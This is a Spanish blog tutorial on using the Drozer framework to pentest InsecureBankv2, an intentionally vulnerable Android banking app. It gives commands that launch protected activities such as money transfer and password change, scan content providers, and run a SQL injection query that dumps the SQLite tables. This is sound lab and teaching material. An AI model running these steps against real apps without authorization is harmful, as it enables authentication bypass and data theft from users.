En este Post, usaremos algunos buenos comandos de esta herramienta y las simulaciones que se pueden hacer.
Complementos necesarios para que funcione:
- sudo pip2.7 install drozer-2.4.4-py2-none-any.whl
- sudo pip2.7 install Twisted-20.3.0-cp27-cp27mu-manylinux1_x86_64.whl
- sudo pip2.7 install pyOpenSSL-19.1.0-py2.py3-none-any.whl
- sudo pip2.7 install protobuf-3.12.2-py2.py3-none-any.whl
- sudo pip2.7 install service_identity-18.1.0-py2.py3-none-any.whl
Herramientas a usar:
- Drozer console - En Debian
- Drozer Agent - APK Android
- InsecureBankv2 - APK Android
Ahora instalamos el agente en el móvil (en mi caso, Nexus 6p), y abrimos el agente de drozer y lo encendemos
Ahora detectamos el agente adb forward tcp:31415 tcp:31415
Ahora nos conectamos a la aplicación drozer console connect --server 192.168.0.3
Validamos en el dispositivo móvil
Ahora ejecutamos el apk instalado
Listo, ahora que todo funciona, necesitamos saber el nombre de la aplicación y como hacerle el llamado.
Ahora ejecutamos este comando run app.package.list y en el resultado que nos sale, buscamos la referencia de la aplicación
Ahora que tenemos la referencias, comenzamos a ejecutar comandos y sacar la información
Ahora sacamos la información del los Activity run app.activity.info -a com.android.insecurebankv2 y después hacemos el llamado de estos Activity
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.DoTransfer
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.ChangePassword
Vemos que podemos levantar algunas pantallas interesantes, esto en una revisión de seguridad seria muy interesante, y en caso de poder aprovecharla para un ataque, seria una fallo destacable.
Ahora seguimos sacando información y vemos la superficie de ataque run app.package.attacksurface com.android.insecurebankv2
Vemos información que nos presenta también los permisos run app.package.info -a com.android.insecurebankv2
Ahora sacamos algunas URLs y vemos si es inyectable y vulnerable run scanner.provider.injection -a com.android.insecurebankv2
También podemos ver información de las tablas de SQLite y hacer una inyección directa run scanner.provider.sqltables -a content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/ --projection "* from sqlite_master --"
sacamos información del broadcast run app.broadcast.info -a com.android.insecurebankv2
En el comando anterior, se puede sacar más información y ejecutar un ataque dirigido (por ejemplo: Mandar un SMS), esto igual depende de los permisos que tenga la aplicación y la configuración de estos.
Espero les sirva, y hasta una próxima :)
Referencias:
No hay comentarios.:
Publicar un comentario